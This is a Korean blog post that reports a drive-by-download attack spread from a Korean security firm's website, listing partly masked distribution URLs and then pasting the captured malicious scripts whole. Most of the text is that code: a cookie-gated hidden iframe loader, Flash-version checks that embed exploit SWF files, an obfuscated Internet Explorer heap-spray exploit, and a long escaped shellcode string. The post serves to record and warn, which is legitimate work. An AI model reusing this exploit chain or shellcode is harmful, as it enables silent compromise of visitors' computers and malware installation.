[악성코드소식] 시스템 파일 변조하는 악성스크립트 주의~!

지난 번 ws2help.dll 악성코드와 동일한 공격방식으로 분석이 아니라 자료를 남기고자 리포팅 한다.

<ws2help.dll 분석 리포트>   - 분석 리포트 보기

인터넷 서핑 중 악성코드에 감염되어 확인 결과
유포지가 우리나라 보안기업 홈페이지로 확인이 되었다.

대부분 영세한 기업의 홈페이지는 호스팅 업체에 맡기고 있으니 보안업체라고 다 보안이 되는건 아니지만
보안업체 홈페이지에서 유포되니.. 참.. 안타깝다.

악성코드 유포지는 다음과 같으며 아직 유포중인 관계로 * 처리를 하였다. (내 스딸이 아니긴 한데..ㅋ)

<악성코드 유포지>   http://do**.han****.co.kr/HanZip_Ins/info/ko.html   http://do**.han****.co.kr/HanZip_Ins/info/1.html   http://do**.han****.co.kr/HanZip_Ins/info/2.html   http://do**.han****.co.kr/HanZip_Ins/info/nb.js   http://do**.han****.co.kr/HanZip_Ins/info/2.js   http://do**.han****.co.kr/HanZip_Ins/info/nb6.swf   http://do**.han****.co.kr/HanZip_Ins/info/nb8.swf

각 악성코드 내용

<script language="JavaScript" type="text/javascript"> var cookieString = document.cookie; var start = cookieString.indexOf("nb116309="); if (start != -1) {  location.replace("about:blank"); } else {  var expires = new Date();  expires.setTime(expires.getTime() + 0.6 * 60 * 60 * 1000);  document.cookie = "nb116309=yes;expires=" + expires.toGMTString();  document.write("<iframe src='1.html' width='116' height='1' frameborder='0'></iframe>");  if((navigator.userAgent.indexOf("M"+"S"+"I"+"E 7")==-1)&&(navigator.userAgent.indexOf("M"+"S"+"I"+"E 8")==-1)){  document.write("<iframe src='2.html' width='116' height='1' frameborder='0'></iframe>");} } </script> <script type="text/javascript" src="http://js.tongji.linezing.com/2497423/tongji.js"></script>

<Script src="nb.js" type="text/javascript"></Script> <script type="text/javascript"> var nbVer=deconcept.SWFObjectUtil["ge"+"tPlay"+"erVers"+"ion"](); if(nbVer['m'+'a'+'j'+'o'+'r']==10) {  if(nbVer['minor']==3)  {   //nb flash 10.3  document.write("<iframe src=nb.htm width=116 height=1></iframe>");  }  else  {   //nb flash 10 ~ 10.2  var ver=0;   var ua = navigator.userAgent.toLowerCase();   if (window.ActiveXObject){if(ua.match(/msie ([\d.]+)/)[1]=='6.0'){ver=1;}}   if(ver==1)   {    document.write('<embed src=nb6.swf width=110 height=1>');   }   else   {    document.write('<embed src=nb8.swf width=100 height=1>');   }  } } else {  //nb flash 6 ~ 9 var ver=0;  var ua = navigator.userAgent.toLowerCase();  if (window.ActiveXObject){if(ua.match(/msie ([\d.]+)/)[1]=='6.0'){ver=1;}}  if(ver==1)  {   document.write('<embed src=nb6.swf width=110 height=1>');  }  else  {   document.write('<embed src=nb8.swf width=100 height=1>');  } } </script>

<BUTTON id=netboom style='DISPLAY: none' onclick=a1();></BUTTON> <script src='2.js'></script> <SCRIPT language='javascript'> var a3 = nb5(); var a4 = nb6(a3); function nb1(){ nbLuck = new Array(); var nbPower = 0x86000-(a4.length*2);  var nbZF = '0'+'c'+'0'+'c'; var nbNop = nb4(nbZF);  nbNop = nbNop + nbNop; while(nbNop.length<nbPower/2) { nbNop+=nbNop; } var nbSize = nbNop.substring(0,nbPower/2); delete nbNop; for(nbx=0; nbx<270; nbx++) { nbLuck[nbx] = nbSize + nbSize + a4;}} function a1() { nb1(); var a7 = document.createElement(nbD); a7.addBehavior(nbC); document.appendChild(a7); try { i=0; while(i<10) { a7.setAttribute('s',window); i++; } } catch(e){ } window.status+=''; } if(navigator.userAgent.toLowerCase().indexOf("m"+"s"+"i"+"e 6")>0){ addr = 241748; document.getElementById('netboom').onclick(); }else if(navigator.userAgent.toLowerCase().indexOf("m"+"s"+"i"+"e 7")>0){ addr = 733120; } function nb3(bytes, mystr, nbstr) { while (mystr.length< bytes){ mystr += mystr; } return mystr.substr(0, (bytes-6)/2) + nbstr; } var nbwmHaha = new Array(); var nbwmXixi = nb4("0"+"d"+"0"+"d"); nbwmXixi = nbwmXixi + nbwmXixi; nbwmXixi = nb3(addr, nbwmXixi, a4); var n = 0; while(n < 1000){      nbwmHaha[n] = nbwmXixi.substr(0, nbwmXixi.length);  n++; } document.write("<"+"t"+"a"+"b"+"l"+"e "+"s"+"t"+"y"+"l"+"e"+"=p"+"o"+"s"+"it"+"io"+"n:"+"a"+"b"+"s"+"o"+"l"+"u"+"t"+"e;"+"c"+"li"+"p:"+"r"+"e"+"ct"+"("+"0)>"); function nb5() { var nb116308="";nb116308+="%u58";nb116308+="58%u585";nb116308+="8%u10EB";nb116308+="%u4B5B%";nb116308+="uC933%u";nb116308+="B966%u0";nb116308+="3B8%u34";nb116308+="80%uBD0";nb116308+="B%uFAE2";nb116308+="%u05EB%";nb116308+="uEBE8%u";nb116308+="FFFF%u5";nb116308+="4FF%uBE";nb116308+="A3%uBDB";nb116308+="D%uD9E2";nb116308+="%u8D1C%";nb116308+="uBDBD%u";nb116308+="36BD%uB";nb116308+="1FD%uCD";nb116308+="36%u10A";nb116308+="1%uD536";nb116308+="%u36B5%";nb116308+="uD74A%u";nb116308+="E4AC%u0";nb116308+="355%uBD";nb116308+="BF%u2DB";nb116308+="D%u455F";nb116308+="%u8ED5%";nb116308+="uBD8F%u";nb116308+="D5BD%uC";nb116308+="EE8%uCF";nb116308+="D8%u36E";nb116308+="9%uB1FB";nb116308+="%u0355%";nb116308+="uBDBC%u";nb116308+="36BD%uD";nb116308+="755%uE4";nb116308+="B8%u235";nb116308+="5%uBDBF";nb116308+="%u5FBD%";nb116308+="uD544%u";nb116308+="D3D2%uB";nb116308+="DBD%uC8";nb116308+="D5%uD1C";nb116308+="F%uE9D0";nb116308+="%uAB42%";nb116308+="u7D38%u";nb116308+="AEC8%uD";nb116308+="2D5%uBD";nb116308+="D3%uD5B";nb116308+="D%uCFC8";nb116308+="%uD0D1%";nb116308+="u36E9%u";nb116308+="B1FB%u3";nb116308+="355%uBD";nb116308+="BC%u36B";nb116308+="D%uD755";nb116308+="%uE4BC%";nb116308+="uD355%u";nb116308+="BDBF%u5";nb116308+="FBD%uD5";nb116308+="44%u8ED";nb116308+="1%uBD8F";nb116308+="%uCED5%";nb116308+="uD8D5%u";nb116308+="E9D1%uF";nb116308+="B36%u55";nb116308+="B1%uBCD";nb116308+="2%uBDBD";nb116308+="%u5536%";nb116308+="uBCD7%u";nb116308+="55E4%uB";nb116308+="FF2%uBD";nb116308+="BD%u445";nb116308+="F%u513C";nb116308+="%uBCBD%";nb116308+="uBDBD%u";nb116308+="6136%u7";nb116308+="E3C%uBD";nb116308+="3D%uBDB";nb116308+="D%uBDD7";nb116308+="%uA7D7%";nb116308+="uD7EE%u";nb116308+="42BD%uE";nb116308+="1EB%u7D";nb116308+="8E%u3DF";nb116308+="D%uBE81";nb116308+="%uC8BD%";nb116308+="u7A44%u";nb116308+="BEB9%uD";nb116308+="2E1%uD8";nb116308+="93%uF97";nb116308+="A%uB9BE";nb116308+="%uD8C5%";nb116308+="uBDBD%u";nb116308+="748E%uE";nb116308+="CEC%uEA";nb116308+="EE%u8EE";nb116308+="C%u367D";nb116308+="%uE5FB%";nb116308+="u9F55%u";nb116308+="BDBC%u3";nb116308+="EBD%uBD";nb116308+="45%u1E5";nb116308+="4%uBDBD";nb116308+="%u2DBD%";nb116308+="uBDD7%u";nb116308+="BDD7%uB";nb116308+="ED7%uBD";nb116308+="D7%uBFD";nb116308+="7%uBDD5";nb116308+="%uBDBD%";nb116308+="uEE7D%u";nb116308+="FB36%u5";nb116308+="599%uBC";nb116308+="BC%uBDB";nb116308+="D%uFB34";nb116308+="%uD7DD%";nb116308+="uEDBD%u";nb116308+="EB42%u3";nb116308+="495%uD9";nb116308+="FB%uFB3";nb116308+="6%uD7DD";nb116308+="%uD7BD%";nb116308+="uD7BD%u";nb116308+="D7BD%uD";nb116308+="7B9%uED";nb116308+="BD%uEB4";nb116308+="2%uD791";nb116308+="%uD7BD%";nb116308+="uD7BD%u";nb116308+="D5BD%uB";nb116308+="DA2%uBD";nb116308+="B2%u42E";nb116308+="D%u81EB";nb116308+="%uFB34%";nb116308+="u36C5%u";nb116308+="D9F3%uC";nb116308+="13D%u42";nb116308+="B5%uC90";nb116308+="9%u3DB1";nb116308+="%uB5C1%";nb116308+="uBD42%u";nb116308+="B8C9%uC";nb116308+="93D%u42";nb116308+="B5%u5F0";nb116308+="9%u3456";nb116308+="%u3D3B%";nb116308+="uBDBD%u";nb116308+="7ABD%uC";nb116308+="DFB%uBD";nb116308+="BD%uBDB";nb116308+="D%uFB7A";nb116308+="%uBDC9%";nb116308+="uBDBD%u";nb116308+="D7BD%uD";nb116308+="7BD%uD7";nb116308+="BD%u36B";nb116308+="D%uDDFB";nb116308+="%u42ED%";nb116308+="u85EB%u";nb116308+="3B36%uB";nb116308+="D3D%uBD";nb116308+="BD%uBDD";nb116308+="7%uF330";nb116308+="%uECC9%";nb116308+="uCB42%u";nb116308+="EDCD%uC";nb116308+="B42%u42";nb116308+="DD%u8DE";nb116308+="B%uCB42";nb116308+="%u42DD%";nb116308+="u89EB%u";nb116308+="CB42%u4";nb116308+="2C5%uFD";nb116308+="EB%u463";nb116308+="6%u7D8E";nb116308+="%u668E%";nb116308+="u513C%u";nb116308+="BFBD%uB";nb116308+="DBD%u71";nb116308+="36%u453";nb116308+="E%uC0E9";nb116308+="%u34B5%";nb116308+="uBCA1%u";nb116308+="7D3E%u5";nb116308+="6B9%u36";nb116308+="4E%u367";nb116308+="1%u3E64";nb116308+="%uAD7E%";nb116308+="u7D8E%u";nb116308+="ECED%uE";nb116308+="DEE%uED";nb116308+="ED%uEDE";nb116308+="D%uEAED";nb116308+="%uEDED%";nb116308+="uEB42%u";nb116308+="36B5%uE";nb116308+="9C3%uAD";nb116308+="55%uBDB";nb116308+="C%u55BD";nb116308+="%uBDD8%";nb116308+="uBDBD%u";nb116308+="DED5%uC";nb116308+="ACB%uD5";nb116308+="BD%uD5C";nb116308+="E%uD2D9";nb116308+="%u36E9%";nb116308+="uB1FB%u";nb116308+="9955%uB";nb116308+="DBD%u34";nb116308+="BD%u81F";nb116308+="B%u1CD9";nb116308+="%uBDB9%";nb116308+="uBDBD%u";nb116308+="1D30%u4";nb116308+="2DD%u42";nb116308+="42%uD8D";nb116308+="7%uCB42";nb116308+="%u3681%";nb116308+="uADFB%u";nb116308+="B555%uB";nb116308+="DBD%u8E";nb116308+="BD%uEE6";nb116308+="6%uEEEE";nb116308+="%u42EE%";nb116308+="u3D6D%u";nb116308+="5585%u8";nb116308+="53D%uC8";nb116308+="54%u3CA";nb116308+="C%uB8C5";nb116308+="%u2D2D%";nb116308+="u2D2D%u";nb116308+="B5C9%u4";nb116308+="236%u36";nb116308+="E8%u305";nb116308+="1%uB8FD";nb116308+="%u5D42%";nb116308+="u1B55%u";nb116308+="BDBD%u7";nb116308+="EBD%u1D";nb116308+="55%uBDB";nb116308+="D%u05BD";nb116308+="%uBCAC%";nb116308+="u3DB9%u";nb116308+="B17F%u5";nb116308+="5BD%uBD";nb116308+="2E%uBDB";nb116308+="D%u513C";nb116308+="%uBCBD%";nb116308+="uBDBD%u";nb116308+="4136%u7";nb116308+="A3E%u7A";nb116308+="B9%u8FB";nb116308+="A%u2CC9";nb116308+="%u7AB1%";nb116308+="uB9FA%u";nb116308+="34DE%uF";nb116308+="26C%uFA";nb116308+="7A%u1DB";nb116308+="5%u2AD8";nb116308+="%u7A76%";nb116308+="uB1FA%u";nb116308+="FDEC%uC";nb116308+="207%uFA";nb116308+="7A%u83A";nb116308+="D%u0BA0";nb116308+="%u7A84%";nb116308+="uA9FA%u";nb116308+="D405%uA";nb116308+="669%uFA";nb116308+="7A%u03A";nb116308+="5%uDBC2";nb116308+="%u7A1D%";nb116308+="uA1FA%u";nb116308+="1441%u1";nb116308+="08A%uFA";nb116308+="7A%u259";nb116308+="D%uADB7";nb116308+="%uD945%";nb116308+="u8D1C%u";nb116308+="BDBD%u3";nb116308+="6BD%uB1";nb116308+="FD%uCD3";nb116308+="6%u10A1";nb116308+="%uD536%";nb116308+="u36B5%u";nb116308+="D74A%uE";nb116308+="4B9%uE9";nb116308+="55%uBDB";nb116308+="D%u2DBD";nb116308+="%u455F%";nb116308+="u8ED5%u";nb116308+="BD8F%uD";nb116308+="5BD%uCE";nb116308+="E8%uCFD";nb116308+="8%u36E9";nb116308+="%u55BB%";nb116308+="u42E8%u";nb116308+="4242%u5";nb116308+="536%uB8";nb116308+="D7%u55E";nb116308+="4%uBD88";nb116308+="%uBDBD%";nb116308+="u445F%u";nb116308+="428E%u4";nb116308+="2EA%uB9";nb116308+="EB%uBF5";nb116308+="6%u7EE5";nb116308+="%u4455%";nb116308+="u4242%u";nb116308+="E642%uB";nb116308+="A7B%u34";nb116308+="05%uBCE";nb116308+="2%u7ADB";nb116308+="%uB8FA%";nb116308+="u5D42%u";nb116308+="EE7E%u6";nb116308+="136%uD7";nb116308+="EE%uD5F";nb116308+="D%uADBD";nb116308+="%uBDBD%";nb116308+="u36EA%u";nb116308+="9DFB%uA";nb116308+="555%u42";nb116308+="42%uE54";nb116308+="2%uEC7E";nb116308+="%u36EB%";nb116308+="u81C8%u";nb116308+="C936%uC";nb116308+="593%u48";nb116308+="BE%u36E";nb116308+="B%u9DCB";nb116308+="%u48BE%";nb116308+="u748E%u";nb116308+="FCF4%uB";nb116308+="E10%u8E";nb116308+="78%uB26";nb116308+="6%uAD03";nb116308+="%u6B87%";nb116308+="uB5C9%u";nb116308+="767C%uB";nb116308+="EBA%uFD";nb116308+="67%u4C5";nb116308+="6%uA286";nb116308+="%u5AC8%";nb116308+="u36E3%u";nb116308+="99E3%u6";nb116308+="0BE%u36";nb116308+="DB%uF6B";nb116308+="1%uE336";nb116308+="%uBEA1%";nb116308+="u3660%u";nb116308+="36B9%u7";nb116308+="8BE%uE3";nb116308+="16%u7EE";nb116308+="4%u6055";nb116308+="%u4241%";nb116308+="u0F42%u";nb116308+="5F4F%u8";nb116308+="449%uC0";nb116308+="5F%u673";nb116308+="E%uC6F5";nb116308+="%u8F80%";nb116308+="u2CC9%u";nb116308+="38B1%u1";nb116308+="262%uDE";nb116308+="06%u6C3";nb116308+="4%uECF2";nb116308+="%u07FD%";nb116308+="u1DC2%u";nb116308+="2AD8%uA";nb116308+="376%uD9";nb116308+="19%u2E5";nb116308+="2%u598F";nb116308+="%u3329%";nb116308+="uB7AE%u";nb116308+="7F11%uF";nb116308+="6A4%u79";nb116308+="BC%uA23";nb116308+="0%uEAC9";nb116308+="%uB0DB%";nb116308+="uFE42%u";nb116308+="1103%uC";nb116308+="066%u18";nb116308+="4D%uEF2";nb116308+="7%u1A43";nb116308+="%u8367%";nb116308+="u0BA0%u";nb116308+="0584%u6";nb116308+="9D4%u03";nb116308+="A6%uDBC";nb116308+="2%u411D";nb116308+="%u8A14%";nb116308+="u2510%u";nb116308+="ADB7%u3";nb116308+="D45%u12";nb116308+="6B%u462";nb116308+="7%uA8EE";nb116308+="%ud5db%";nb116308+="uc9c9%u";nb116308+="87cd%u9";nb116308+="292%ud1";nb116308+="c8%udcd";nb116308+="0%ud4d3";nb116308+="%ude93%ud0d2%ud892%ucfcf%ucfd2%u8b92%u898f%ude93%ucece%ubdbd"; return nb116308; } </SCRIPT>

/**  * SWFObject v1.5.1: Flash Player detection and embed - [ NetBoom ]  *  * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:  * http://www.opensource.org/licenses/mit-license.php  *  */ if(typeof deconcept == "undefined") var deconcept = {}; if(typeof deconcept.util == "undefined") deconcept.util = {}; if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = {}; deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) {  if (!document.getElementById) { return; }  this.DETECT_KEY = detectKey ? detectKey : 'detectflash';  this.skipDetect = deconcept.util.getRequestParameter(this.DETECT_KEY);  this.params = {};  this.variables = {};  this.attributes = [];  if(swf) { this.setAttribute('swf', swf); }  if(id) { this.setAttribute('id', id); }  if(w) { this.setAttribute('width', w); }  if(h) { this.setAttribute('height', h); }  if(ver) { this.setAttribute('version', new deconcept.PlayerVersion(ver.toString().split("."))); }  this.installedVer = deconcept.SWFObjectUtil.getPlayerVersion();  if (!window.opera && document.all && this.installedVer.major > 7) {   // only add the onunload cleanup if the Flash Player version supports External Interface and we are in IE   // fixes bug in some fp9 versions see http://blog.deconcept.com/2006/07/28/swfobject-143-released/   if (!deconcept.unloadSet) {    deconcept.SWFObjectUtil.prepUnload = function() {     __flash_unloadHandler = function(){};     __flash_savedUnloadHandler = function(){};     window.attachEvent("onunload", deconcept.SWFObjectUtil.cleanupSWFs);    }    window.attachEvent("onbeforeunload", deconcept.SWFObjectUtil.prepUnload);    deconcept.unloadSet = true;   }  }  if(c) { this.addParam('bgcolor', c); }  var q = quality ? quality : 'high';  this.addParam('quality', q);  this.setAttribute('useExpressInstall', false);  this.setAttribute('doExpressInstall', false);  var xir = (xiRedirectUrl) ? xiRedirectUrl : window.location;  this.setAttribute('xiRedirectUrl', xir);  this.setAttribute('redirectUrl', '');  if(redirectUrl) { this.setAttribute('redirectUrl', redirectUrl); } } deconcept.SWFObject.prototype = {  useExpressInstall: function(path) {   this.xiSWFPath = !path ? "expressinstall.swf" : path;   this.setAttribute('useExpressInstall', true);  },  setAttribute: function(name, value){   this.attributes[name] = value;  },  getAttribute: function(name){   return this.attributes[name] || "";  },  addParam: function(name, value){   this.params[name] = value;  },  getParams: function(){   return this.params;  },  addVariable: function(name, value){   this.variables[name] = value;  },  getVariable: function(name){   return this.variables[name] || "";  },  getVariables: function(){   return this.variables;  },  getVariablePairs: function(){   var variablePairs = [];   var key;   var variables = this.getVariables();   for(key in variables){    variablePairs[variablePairs.length] = key +"="+ variables[key];   }   return variablePairs;  },  getSWFHTML: function() {   var swfNode = "";   if (navigator.plugins && navigator.mimeTypes && navigator.mimeTypes.length) { // netscape plugin architecture    if (this.getAttribute("doExpressInstall")) {     this.addVariable("MMplayerType", "PlugIn");     this.setAttribute('swf', this.xiSWFPath);    }    swfNode = '<embed type="application/x-shockwave-flash" src="'+ this.getAttribute('swf') +'" width="'+ this.getAttribute('width') +'" height="'+ this.getAttribute('height') +'" style="'+ (this.getAttribute('style') || "") +'"';    swfNode += ' id="'+ this.getAttribute('id') +'" name="'+ this.getAttribute('id') +'" ';    var params = this.getParams();     for(var key in params){ swfNode += [key] +'="'+ params[key] +'" '; }    var pairs = this.getVariablePairs().join("&");     if (pairs.length > 0){ swfNode += 'flashvars="'+ pairs +'"'; }    swfNode += '/>';   } else { // PC IE    if (this.getAttribute("doExpressInstall")) {     this.addVariable("MMplayerType", "ActiveX");     this.setAttribute('swf', this.xiSWFPath);    }    swfNode = '<object id="'+ this.getAttribute('id') +'" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+ this.getAttribute('width') +'" height="'+ this.getAttribute('height') +'" style="'+ (this.getAttribute('style') || "") +'">';    swfNode += '<param name="movie" value="'+ this.getAttribute('swf') +'" />';    var params = this.getParams();    for(var key in params) {     swfNode += '<param name="'+ key +'" value="'+ params[key] +'" />';    }    var pairs = this.getVariablePairs().join("&");    if(pairs.length > 0) {swfNode += '<param name="flashvars" value="'+ pairs +'" />';}    swfNode += "</object>";   }   return swfNode;  },  write: function(elementId){   if(this.getAttribute('useExpressInstall')) {    // check to see if we need to do an express install    var expressInstallReqVer = new deconcept.PlayerVersion([6,0,65]);    if (this.installedVer.versionIsValid(expressInstallReqVer) && !this.installedVer.versionIsValid(this.getAttribute('version'))) {     this.setAttribute('doExpressInstall', true);     this.addVariable("MMredirectURL", escape(this.getAttribute('xiRedirectUrl')));     document.title = document.title.slice(0, 47) + " - Flash Player Installation";     this.addVariable("MMdoctitle", document.title);    }   }   if(this.skipDetect || this.getAttribute('doExpressInstall') || this.installedVer.versionIsValid(this.getAttribute('version'))){    var n = (typeof elementId == 'string') ? document.getElementById(elementId) : elementId;    n.innerHTML = this.getSWFHTML();    return true;   }else{    if(this.getAttribute('redirectUrl') != "") {     document.location.replace(this.getAttribute('redirectUrl'));    }   }   return false;  } } /* ---- detection functions ---- */ deconcept.SWFObjectUtil.getPlayerVersion = function(){  var PlayerVersion = new deconcept.PlayerVersion([0,0,0]);  if(navigator.plugins && navigator.mimeTypes.length){   var x = navigator.plugins["Shockwave Flash"];   if(x && x.description) {    PlayerVersion = new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split("."));   }  }else if (navigator.userAgent && navigator.userAgent.indexOf("Windows CE") >= 0){ // if Windows CE   var axo = 1;   var counter = 3;   while(axo) {    try {     counter++;     axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+ counter); //    document.write("player v: "+ counter);     PlayerVersion = new deconcept.PlayerVersion([counter,0,0]);    } catch (e) {     axo = null;    }   }  } else { // Win IE (non mobile)   // do minor version lookup in IE, but avoid fp6 crashing issues   // see http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/   try{    var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");   }catch(e){    try {     var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");     PlayerVersion = new deconcept.PlayerVersion([6,0,21]);     axo.AllowScriptAccess = "always"; // error if player version < 6.0.47 (thanks to Michael Williams @ Adobe for this code)    } catch(e) {     if (PlayerVersion.major == 6) {      return PlayerVersion;     }    }    try {     axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");    } catch(e) {}   }   if (axo != null) {    PlayerVersion = new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));   }  }  return PlayerVersion; } deconcept.PlayerVersion = function(arrVersion){  this.major = arrVersion[0] != null ? parseInt(arrVersion[0]) : 0;  this.minor = arrVersion[1] != null ? parseInt(arrVersion[1]) : 0;  this.rev = arrVersion[2] != null ? parseInt(arrVersion[2]) : 0; } deconcept.PlayerVersion.prototype.versionIsValid = function(fv){  if(this.major < fv.major) return false;  if(this.major > fv.major) return true;  if(this.minor < fv.minor) return false;  if(this.minor > fv.minor) return true;  if(this.rev < fv.rev) return false;  return true; } /* ---- get value of query string param ---- */ deconcept.util = {  getRequestParameter: function(param) {   var q = document.location.search || document.location.hash;   if (param == null) { return q; }   if(q) {    var pairs = q.substring(1).split("&");    for (var i=0; i < pairs.length; i++) {     if (pairs[i].substring(0, pairs[i].indexOf("=")) == param) {      return pairs[i].substring((pairs[i].indexOf("=")+1));     }    }   }   return "";  } } /* fix for video streaming bug */ deconcept.SWFObjectUtil.cleanupSWFs = function() {  var objects = document.getElementsByTagName("OBJECT");  for (var i = objects.length - 1; i >= 0; i--) {   objects[i].style.display = 'none';   for (var x in objects[i]) {    if (typeof objects[i][x] == 'function') {     objects[i][x] = function(){};    }   }  } } /* add document.getElementById if needed (mobile IE < 5) */ if (!document.getElementById && document.all) { document.getElementById = function(id) { return document.all[id]; }} /* add some aliases for ease of use/backwards compatibility */ var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; // for legacy support var SWFObject = deconcept.SWFObject;

var nbC="#"+"d"+"ef"+"au"+"l"+"t"+"#"+"u"+"se"+"rDa"+"t"+"a", nbD="b"+"o"+"d"+"y", addr; function nb4(wm) { var nbwmx = "%" + "u" + wm; return unescape(nbwmx); } function nb6(ALYac) { return unescape(ALYac); }